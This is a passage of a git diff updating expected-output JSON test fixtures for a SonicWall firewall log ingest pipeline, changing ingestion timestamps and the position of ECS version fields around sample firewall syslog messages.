192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=8 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN", "event": { - "ingested": "2021-06-09T13:23:15.557850800Z" + "ingested": "2021-12-14T14:54:38.285975660Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:11\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23422 src=2.2.2.2:36704:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000", "event": { - "ingested": "2021-06-09T13:23:15.557855700Z" + "ingested": "2021-12-14T14:54:38.285976167Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=1.1.1.1 pri=5 c=256 m=38 msg=\"ICMP packet dropped\" n=22070 src=219.89.19.223:1026:WAN dst=1.1.1.1:6822:WAN type=3 code=3", "event": { - "ingested": "2021-06-09T13:23:15.557861600Z" + "ingested": "2021-12-14T14:54:38.285976664Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568000 src=219.89.19.223:1026:WAN dst=1.1.1.1:0:WAN proto=udp/0", "event": { - "ingested": "2021-06-09T13:23:15.557866900Z" + "ingested": "2021-12-14T14:54:38.285977319Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=16 m=346 msg=\"IKE Initiator: Start Quick Mode (Phase 2).\" n=171872 src=2.2.2.2:500 dst=1.1.1.1:500", "event": { - "ingested": "2021-06-09T13:23:15.557871900Z" + "ingested": "2021-12-14T14:54:38.285977799Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23423 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500", "event": { - "ingested": "2021-06-09T13:23:15.557876800Z" + "ingested": "2021-12-14T14:54:38.285978276Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=4 c=16 m=483 msg=\"Received notify: INVALID_ID_INFO\" n=171625 src=2.2.2.2:500 dst=1.1.1.1:500", "event": { - "ingested": "2021-06-09T13:23:15.557881300Z" + "ingested": "2021-12-14T14:54:38.285978789Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns", "event": { - "ingested": "2021-06-09T13:23:15.557886Z" + "ingested": "2021-12-14T14:54:38.285979271Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:17\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445", "event": { - "ingested": "2021-06-09T13:23:15.557890800Z" + "ingested": "2021-12-14T14:54:38.285979888Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:18\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568001 src=2.2.2.2:36699:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000 sent=1557 rcvd=957", "event": { - "ingested": "2021-06-09T13:23:15.557902200Z" + "ingested": "2021-12-14T14:54:38.285980380Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568002 src=192.168.5.10:3417:LAN dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy=\"name\"", "event": { - "ingested": "2021-06-09T13:23:15.557906800Z" + "ingested": "2021-12-14T14:54:38.285980866Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582", "event": { - "ingested": "2021-06-09T13:23:15.557911500Z" + "ingested": "2021-12-14T14:54:38.285981344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:21\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns", "event": { - "ingested": "2021-06-09T13:23:15.557916300Z" + "ingested": "2021-12-14T14:54:38.285981819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-generated.log-expected.json b/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-generated.log-expected.json index 3754eaef6f7..fd16e88f116 100644 --- a/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "id=nnumqua sn=eacommod time=\"2016/01/29 06:09:59\" fw=10.208.232.8 pri=very-high c=tur m=1197 msg=\"itv\" sess=odoco n=ria src=10.20.234.169:1001:eth5722 dst= 10.208.15.216:4257:lo6125 note= \"ntsunti Protocol:udp\" npcs=ciade", "event": { - "ingested": "2021-06-09T13:23:15.703529400Z" + "ingested": "2021-12-14T14:54:38.699396802Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idi id=pexe sn=nes time=\"2016/02/12 13:12:33\" fw=10.254.41.82 pri=low c=Ute m=914 msg=\"lupt\" n=dolore src=10.92.136.230:6437:eth7178:nostrud4819.mail.test dst=10.49.111.67:884:eth3598:oreetdol1714.internal.corp", "event": { - "ingested": "2021-06-09T13:23:15.703550Z" + "ingested": "2021-12-14T14:54:38.699400030Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=umexe sn=estlabo time=\"2016/02/26 20:15:08\" fw=10.186.114.123 pri=high c=olupt m=16 Web site accessed", "event": { - "ingested": "2021-06-09T13:23:15.703555700Z" + "ingested": "2021-12-14T14:54:38.699400548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=alo sn=eosquir time=\"2016-3-12 3:17:42\" fw=10.149.203.46 pri=medium c=mwritten m=1369 msg=\"ctetur\" n=uidolorsrc=10.150.156.22:6378:eth6183dst=10.227.15.1:410:eth1977srcMac=01:00:5e:84:66:6cdstMac=01:00:5e:f7:a9:ffproto=rdp/ommfw_action=\"allow\"", "event": { - "ingested": "2021-06-09T13:23:15.703560900Z" + "ingested": "2021-12-14T14:54:38.699400949Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emape id=aer sn=lupt time=\"2016/03/26 10:20:16\" fw=10.26.46.95 pri=medium c=temvel m=127 PPPoE LCP Link Up", "event": { - "ingested": "2021-06-09T13:23:15.703564900Z" + "ingested": "2021-12-14T14:54:38.699401326Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=consec sn=taliquip time=\"2016/04/09 17:22:51\" fw=10.134.172.34 pri=high c=snos m=170 Received a path MTU icmp message from router/gateway", "event": { - "ingested": "2021-06-09T13:23:15.703569200Z" + "ingested": "2021-12-14T14:54:38.699401686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tconsec sn=nsequat time=\"2016/04/24 00:25:25\" fw=10.137.246.137 pri=medium c=oluptas m=372 msg=\"llu\" n=uptassi src=10.95.245.65 dst=10.13.70.213", "event": { - "ingested": "2021-06-09T13:23:15.703573200Z" + "ingested": "2021-12-14T14:54:38.699402045Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "llamcorp id=ari sn=eataevit time=\"2016/05/08 07:27:59\" fw=10.50.112.141 pri=very-high c=dmi m=176 Fraudulent Microsoft Certificate Blocked", "event": { - "ingested": "2021-06-09T13:23:15.703577Z" + "ingested": "2021-12-14T14:54:38.699402403Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mquisnos id=loremagn sn=iciade time=\"2016/05/22 14:30:33\" fw=10.137.104.79 pri=medium c=mUt m=50 RealAudio decode failure", "event": { - "ingested": "2021-06-09T13:23:15.703580800Z" + "ingested": "2021-12-14T14:54:38.699402765Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=aali sn=ametcons time=\"2016/06/05 21:33:08\" fw=10.244.98.230 pri=low c=iinea m=87 IKE Responder: Accepting IPSec proposal", "event": { - "ingested": "2021-06-09T13:23:15.703585Z" + "ingested": "2021-12-14T14:54:38.699403183Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emip id=tvol sn=moll time=\"2016/06/20 04:35:42\" fw=10.228.149.225 pri=high c=deomni m=139 msg=\"accept\" n=onse src=10.136.153.149:3788:enp0s2489 dst= 10.16.52.205", "event": { - "ingested": "2021-06-09T13:23:15.703589100Z" + "ingested": "2021-12-14T14:54:38.699403610Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orsitame id=quiratio sn=ite time=\"2016/07/04 11:38:16\" fw=10.72.98.186 pri=very-high c=ercit m=15 Newsgroup blocked", "event": { - "ingested": "2021-06-09T13:23:15.703593200Z" + "ingested": "2021-12-14T14:54:38.699404168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=usan sn=aper time=\"2016/07/18 18:40:50\" fw=10.183.16.166 pri=low c=ender m=70 IPSec packet from illegal host", "event": { - "ingested": "2021-06-09T13:23:15.703599200Z" + "ingested": "2021-12-14T14:54:38.699404530Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=atquovo sn=iumto time=\"2016/08/02 01:43:25\" fw=10.117.18.47 pri=low c=essecill m=129 PPPoE terminated", "event": { - "ingested": "2021-06-09T13:23:15.703603300Z" + "ingested": "2021-12-14T14:54:38.699404890Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=undeo sn=loremip time=\"2016-8-16 8:45:59\" fw=10.134.0.141 pri=very-high c=uis m=1149 msg=\"idolore\" n=onse fw_action=\"cancel\"", "event": { - "ingested": "2021-06-09T13:23:15.703607300Z" + "ingested": "2021-12-14T14:54:38.699405267Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=rveli sn=rsint time=\"2016/08/30 15:48:33\" fw=10.172.146.234 pri=very-high c=Nemoeni m=81 Smurf Amplification Attack Dropped", "event": { - "ingested": "2021-06-09T13:23:15.703611100Z" + "ingested": "2021-12-14T14:54:38.699405691Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=qua sn=luptatev time=\"2016/09/13 22:51:07\" fw=10.123.104.59 pri=low c=elaudant m=1110 msg=\"tinvol\" n=lores", "event": { - "ingested": "2021-06-09T13:23:15.703615100Z" + "ingested": "2021-12-14T14:54:38.699406158Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tatiset sn=eprehen time=\"2016/09/28 05:53:42\" fw=10.117.146.33 pri=high c=entsu m=10 Problem loading the Filter list; check Filter settings", "event": { - "ingested": "2021-06-09T13:23:15.703618800Z" + "ingested": "2021-12-14T14:54:38.699406507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=aliq sn=rsitam time=\"2016/10/12 12:56:16\" fw=10.79.33.129 pri=high c=umdolo m=353 msg=\"onproide\" n=Nemoen src=10.241.178.107 dst=10.30.196.102 dstname=fugi4637.www.lan lifeSeconds=imadmini\"", "event": { - "ingested": "2021-06-09T13:23:15.703622400Z" + "ingested": "2021-12-14T14:54:38.699406857Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=itecto sn=erc time=\"2016/10/26 19:58:50\" fw=10.69.57.206 pri=high c=nsec m=68 IPSec Decryption Failed", "event": { - "ingested": "2021-06-09T13:23:15.703626Z" + "ingested": "2021-12-14T14:54:38.699407202Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tat sn=tion time=\"2016/11/10 03:01:24\" fw=10.53.150.119 pri=medium c=uasia m=24 msg=\"emp\" n=aperia src=10.157.161.103:383 dst=10.78.151.178:3088 note=\"taut\"", "event": { - "ingested": "2021-06-09T13:23:15.703629600Z" + "ingested": "2021-12-14T14:54:38.699407563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tati sn=utaliqu time=\"2016/11/24 10:03:59\" fw=10.53.187.44 pri=high c=iadese m=242 msg=\"imidest\" n=emagnama src= 10.153.136.222 dst= 10.206.136.206:4108", "event": { - "ingested": "2021-06-09T13:23:15.703633500Z" + "ingested": "2021-12-14T14:54:38.699407938Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nidolo sn=tatn time=\"2016/12/08 17:06:33\" fw=10.18.109.121 pri=very-high c=dolo m=87 msg=\"Loremip\" n=idolor src=10.204.11.20 dst=10.239.201.234", "event": { - "ingested": "2021-06-09T13:23:15.703637300Z" + "ingested": "2021-12-14T14:54:38.699408300Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=quip sn=mporain time=\"2016-12-23 12:09:07\" fw=10.34.161.166 pri=very-high c=sequi m=428 msg=\"rehend\" n=tio src=10.245.200.97:3768:eth4059 dst=10.219.116.137:3452:enp0s3611 srcMac= 01:00:5e:1a:ec:91 dstMac=01:00:5e:e1:73:47 proto=icmp fw_action=\"accept\"", "event": { - "ingested": "2021-06-09T13:23:15.703641100Z" + "ingested": "2021-12-14T14:54:38.699408770Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=idex sn=xerci time=\"2017/01/06 07:11:41\" fw=10.84.206.79 pri=high c=uipe m=401 msg=\"inesci\" n=serror src=10.118.80.140 dst=10.252.122.195 dstname=eFinib", "event": { - "ingested": "2021-06-09T13:23:15.703644900Z" + "ingested": "2021-12-14T14:54:38.699409135Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ari sn=exercit time=\"2017/01/20 14:14:16\" fw=10.220.244.59 pri=high c=oluptate m=143 Backup firewall has transitioned to Active", "event": { - "ingested": "2021-06-09T13:23:15.703648700Z" + "ingested": "2021-12-14T14:54:38.699409521Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=serunt sn=aquaeabi time=\"2017/02/03 21:16:50\" fw=10.171.157.74 pri=high c=emoe m=104 Retransmitting DHCP REQUEST (Verifying).", "event": { - "ingested": "2021-06-09T13:23:15.703652300Z" + "ingested": "2021-12-14T14:54:38.699409881Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=veniamq sn=one time=\"2017/02/18 04:19:24\" fw=10.4.26.208 pri=very-high c=reseos m=156 Backup received heartbeat from wrong source", "event": { - "ingested": "2021-06-09T13:23:15.703656Z" + "ingested": "2021-12-14T14:54:38.699410273Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tin sn=tenima time=\"2017/03/04 11:21:59\" fw=10.241.177.156 pri=medium c=proide m=132 PPPoE discovery process complete", "event": { - "ingested": "2021-06-09T13:23:15.703659700Z" + "ingested": "2021-12-14T14:54:38.699410629Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tmollita sn=fde time=\"2017-3-18 6:24:33\" fw=10.149.89.126 pri=high c=abo m=794 msg=\"veniamqu\" sid=nse spycat=non spypri=paquioff pktdatId=mquisnos n=maven src=10.86.101.235:3266:lo6501 dst=10.30.153.159:6843:enp0s6487 proto=icmp/eporr fw_action=\"cancel\"", "event": { - "ingested": "2021-06-09T13:23:15.703663300Z" + "ingested": "2021-12-14T14:54:38.699410981Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=aturQui sn=utlabor time=\"2017/04/02 01:27:07\" fw=10.38.249.71 pri=low c=mfugiat m=133 PPPoE starting CHAP Authentication", "event": { - "ingested": "2021-06-09T13:23:15.703666900Z" + "ingested": "2021-12-14T14:54:38.699411359Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tvolu sn=ecte time=\"2017/04/16 08:29:41\" fw=10.130.14.60 pri=low c=iciadese m=9 No new Filter list available", "event": { - "ingested": "2021-06-09T13:23:15.703670400Z" + "ingested": "2021-12-14T14:54:38.699411721Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupta id=litse sn=icabo time=\"2017/04/30 15:32:16\" fw=10.89.208.95 pri=low c=llumdolo m=255 msg=\"nre\" n=ercitat src=10.237.163.139 dst=10.162.172.28", "event": { - "ingested": "2021-06-09T13:23:15.703674Z" + "ingested": "2021-12-14T14:54:38.699412081Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ionevo id=ugiatnu sn=ciati time=\"2017/05/14 22:34:50\" fw=10.184.122.157 pri=medium c=scivelit m=31 msg=\"allow\" n=ehen src=10.191.23.41:1493:eth4488 dst= 10.250.47.252 ", "event": { - "ingested": "2021-06-09T13:23:15.703677600Z" + "ingested": "2021-12-14T14:54:38.699412437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=pta sn=tetu time=\"2017/05/29 05:37:24\" fw=10.101.57.134 pri=low c=Nequepo m=12 Problem sending log email; check log settings", "event": { - "ingested": "2021-06-09T13:23:15.703681400Z" + "ingested": "2021-12-14T14:54:38.699412896Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntocc id=uteirure sn=nevo time=\"2017/06/12 12:39:58\" fw=10.226.23.214 pri=very-high c=adip m=994 msg=\"tium\" n=nnum usr=tenbyCi src=10.16.72.220:1842 dst=10.111.187.12:3577 note=\"quinesc\"", "event": { - "ingested": "2021-06-09T13:23:15.703685Z" + "ingested": "2021-12-14T14:54:38.699413328Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tur sn=roi time=\"2017/06/26 19:42:33\" fw=10.106.31.86 pri=low c=sno m=7 Log full; deactivating SonicWALL", "event": { - "ingested": "2021-06-09T13:23:15.703688700Z" + "ingested": "2021-12-14T14:54:38.699413685Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntocca id=ostru sn=ntoccae time=\"2017/07/11 02:45:07\" fw=10.35.99.92 pri=medium c=iatisu m=866 msg=\"sec\" sess=cons n=sBon", "event": { - "ingested": "2021-06-09T13:23:15.703692400Z" + "ingested": "2021-12-14T14:54:38.699414035Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ten sn=vita time=\"2017/07/25 09:47:41\" fw=10.35.5.16 pri=high c=emaccusa m=538 msg=\"accept\" n=qui src=10.143.76.137:1414:lo3470 dst= 10.131.61.13", "event": { - "ingested": "2021-06-09T13:23:15.703696100Z" + "ingested": "2021-12-14T14:54:38.699414394Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=evolu sn=ersp time=\"2017/08/08 16:50:15\" fw=10.64.221.30 pri=medium c=inven m=793 msg=\"osquira\" af_polid=tes af_policy=\"mquame\" af_type=\"nihilmol\" af_service=\"xercita\" af_action=\"trud\" n=eriti src=10.99.0.226:2984:eth1766:sequatu341.mail.invalid dst=10.77.129.130:6604:enp0s4138:Nemoenim2039.api.localhost", "event": { - "ingested": "2021-06-09T13:23:15.703699700Z" + "ingested": "2021-12-14T14:54:38.699415050Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nbyCic sn=utlabor time=\"2017/08/22 23:52:50\" fw=10.27.251.77 pri=medium c=ine m=905 msg=\"lup\" n=tatemUt", "event": { - "ingested": "2021-06-09T13:23:15.703703300Z" + "ingested": "2021-12-14T14:54:38.699415469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=quovol sn=nve time=\"2017/09/06 06:55:24\" fw=10.104.201.10 pri=very-high c=ccaecat m=94 Diagnostic Code B", "event": { - "ingested": "2021-06-09T13:23:15.703707300Z" + "ingested": "2021-12-14T14:54:38.699415836Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tau id=exercita sn=ris time=\"2017/09/20 13:57:58\" fw=10.84.25.23 pri=high c=boree m=565 msg=\"intoc\" n=ncidi", "event": { - "ingested": "2021-06-09T13:23:15.703711Z" + "ingested": "2021-12-14T14:54:38.699416198Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "irat id=onev sn=aturauto time=\"2017/10/04 21:00:32\" fw=10.218.243.47 pri=very-high c=oremi m=37 UDP packet dropped", "event": { - "ingested": "2021-06-09T13:23:15.703714700Z" + "ingested": "2021-12-14T14:54:38.699416556Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=temUt sn=olor time=\"2017/10/19 04:03:07\" fw=10.19.10.148 pri=low c=niamqui m=4 SonicWALL activated", "event": { - "ingested": "2021-06-09T13:23:15.703718300Z" + "ingested": "2021-12-14T14:54:38.699416916Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ess sn=ipisci time=\"2017/11/02 11:05:41\" fw=10.113.95.59 pri=very-high c=reprehen m=156 Backup received heartbeat from wrong source", "event": { - "ingested": "2021-06-09T13:23:15.703721900Z" + "ingested": "2021-12-14T14:54:38.699417320Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "luptate id=persp sn=entsunt time=\"2017/11/16 18:08:15\" fw=10.206.107.211 pri=low c=fugi m=140 msg=\"accept\" n=inci src=10.230.173.4:2631:enp0s5632 dst= 10.192.27.157", "event": { - "ingested": "2021-06-09T13:23:15.703725600Z" + "ingested": "2021-12-14T14:54:38.699417681Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=cusant sn=atemq time=\"2017/12/01 01:10:49\" fw=10.136.31.188 pri=high c=borios m=118 Sending DHCP REQUEST (Verifying).", "event": { - "ingested": "2021-06-09T13:23:15.703729400Z" + "ingested": "2021-12-14T14:54:38.699418040Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ercita sn=ciadeser time=\"2017/12/15 08:13:24\" fw=10.175.236.135 pri=medium c=isnisi m=18 ActiveX blocked", "event": { - "ingested": "2021-06-09T13:23:15.703733100Z" + "ingested": "2021-12-14T14:54:38.699418399Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=isiuta sn=orsitam time=\"2017/12/29 15:15:58\" fw=10.159.119.34 pri=high c=psaquaea m=195 msg=\"taevita\" n=ameiusm src=10.227.15.253 dst=10.190.175.158 sport=271 dport=7005 rcvd=6587", "event": { - "ingested": "2021-06-09T13:23:15.703736600Z" + "ingested": "2021-12-14T14:54:38.699419999Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nre sn=veli time=\"2018/01/12 22:18:32\" fw=10.62.147.186 pri=low c=elitse m=22 Ping of death blocked", "event": { - "ingested": "2021-06-09T13:23:15.703740200Z" + "ingested": "2021-12-14T14:54:38.699420449Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=quasia sn=adi time=\"2018/01/27 05:21:06\" fw=10.9.12.248 pri=medium c=mac m=616 msg=\"block\" n=aveni src=10.29.155.171:1871 dst=10.15.97.155:5935", "event": { - "ingested": "2021-06-09T13:23:15.703743700Z" + "ingested": "2021-12-14T14:54:38.699420816Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=llamco sn=nea time=\"2018/02/10 12:23:41\" fw=10.123.143.188 pri=medium c=orsit m=9 No new Filter list available", "event": { - "ingested": "2021-06-09T13:23:15.703747400Z" + "ingested": "2021-12-14T14:54:38.699421184Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ise sn=itau time=\"2018/02/24 19:26:15\" fw=10.44.22.97 pri=very-high c=lorsita m=907 msg=\"dolore\" n=uptate", "event": { - "ingested": "2021-06-09T13:23:15.703751600Z" + "ingested": "2021-12-14T14:54:38.699421626Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 